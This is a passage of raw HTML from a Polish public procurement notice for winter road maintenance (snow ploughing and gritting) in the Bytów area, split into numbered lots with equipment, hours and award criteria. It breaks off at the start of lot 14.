                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza zmiany zawartej umowy w następujących przypadkach:
    a) siła wyższa powodująca zwiększenie lub zmniejszenie zakresu przedmiotu umowy,
    b) zmiana obowiązującej stawki VAT,
    c) zmiany regulacji prawnych obowiązujących po dniu zawarcia umowy,
    d) zmian korzystnych dla Zamawiającego.   
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania ulic powiatowych wraz z chodnikami na terenie miasta Bytów oraz bazy Bytów<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Usługi w zakresie zimowego utrzymania (odśnieżanie i posypywanie) ulic i chodników na terenie miasta Bytów oraz interwencyjnie chodników w miejscowościach na terenie bazy Bytów wykonywane ciągnikiem z  pługiem 
      i piaskarką - 1 szt. (garażowanie w m. Bytów lub okolice).
      Zakłada się 300 godzin pracy sprzętu. 
2.   Dostawę mieszanki piaskowo  solnej używanej do zwalczania śliskości 
      w przewidywanej ilości  200 Mg.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2,
                    14211000-3,
                    34927100-2,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Temin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin: Bytów, Borzytuchom, Tuchomie  z bazą w Bytowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów, Borzytuchom, Tuchomie.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin: Bytów, Parchowo, Czarna Dąbrówka  z bazą w Bytowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa wykonywana samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów, Parchowo, Czarna Dąbrówka.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin:  Bytów i Studzienice z bazą w Bytowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa wykonywana samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów i Studzienice.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin:  Bytów, Parchowo, Studzienice  z bazą w Bytowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa wykonywana samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem 
i piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 280 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Bytów, Parchowo, Studzienice.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie Bytów).
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na  terenie gmin:  Parchowo  i Czarna Dąbrówka z bazą w Bytowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługa wykonywana ciągnikiem rolniczym o mocy min. 80 KM z pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gmin: Parchowo i Czarna Dąbrówka z bazą
w Bytowie.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Trmin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na  terenie gmin:  Parchowo  i Studzienice z bazą w Bytowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane ciągnikiem rolniczym o mocy min. 80 KM  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gmin: Parchowo i Studzienice z bazą
w Bytowie.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Usługi ładowarką do załadunku mieszanki piaskowo-solnej na terenie bazy Bytów przy ulicy Leśnej 1, oraz usuwania zasp śnieżnych. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi ładowarką do załadunku mieszanki piaskowo-solnej na
terenie bazy Bytów przy ulicy Leśnej 1, oraz usuwania zasp śnieżnych. 

Zakładane jest następujące wykorzystanie jednostkowe:
-	praca  - 250 godz.
-	postój  80 godz.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45520000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gmin:  Kołczygłowy i Trzebielino z bazą  w Kołczygłowach <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane:
 a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z  pługiem i
piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 300 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gmin: Kołczygłowy i Trzebielino  z bazą  w
Kołczygłowach.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w Kołczygłowach).

b)  ciągnikiem rolniczym o mocy min. 80 KM z  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gmin: Kołczygłowy i Trzebielino z bazą  w
Kołczygłowach.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Trzebielino<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane ciągnikiem rolniczym o mocy min. 80 KM z  pługiem i piaskarką   1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gminy Trzebielino.
W załączeniu wykaz tras zimowego utrzymania dróg.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadcznie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Czarna Dąbrówka  z bazą w Czarnej Dąbrówce<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wkonywane:
a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z  pługiem i
piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 300 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gminy  Czarna Dąbrówka.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie w Czarnej Dąbrówce).

b) ciągnikiem rolniczym o mocy min. 80 KM z pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gminy Czarna Dąbrówka.  

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadcznie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Lipnica  z bazą  na terenie gminy Lipnica.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane:
a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką - 1 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 300 godz.
-	postój 				    -   80 godz.
Sprzęt ten będzie pracował na terenie gminy Lipnica.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie na terenie gminy Lipnica);

b) ciągnikiem rolniczym o mocy min. 80 KM z  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 100 godz.
Sprzęt ten będzie pracował na terenie gminy Lipnica.  

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadzenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>13
                  
                <b>Nazwa: </b>Usługi w zakresie zimowego utrzymania dróg powiatowych na terenie gminy Tuchomie  z bazą  na terenie gminy Tuchomie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Usługi wykonywane:
a)  samochodem ciężarowym o ładowności co najmniej 8 Mg z pługiem i
piaskarką - 2 szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie i posypywanie)  - 550 godz.
-	postój 				    - 150 godz.
Sprzęt ten będzie pracował na terenie gminy Tuchomie.  
W załączeniu wykaz tras zimowego utrzymania dróg.
(załadunek mieszanki piaskowo-solnej na bazie na terenie gminy Tuchomie);

b) ciągnikiem rolniczym o mocy min. 80 KM z  pługiem czołowym  1szt. 
Zakładane jest następujące wykorzystanie jednostkowe:
-	praca (odśnieżanie)  - 150 godz.
Sprzęt ten będzie pracował na terenie gminy Tuchomie.  
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9, 90630000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Doświadczenie</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>14
                  
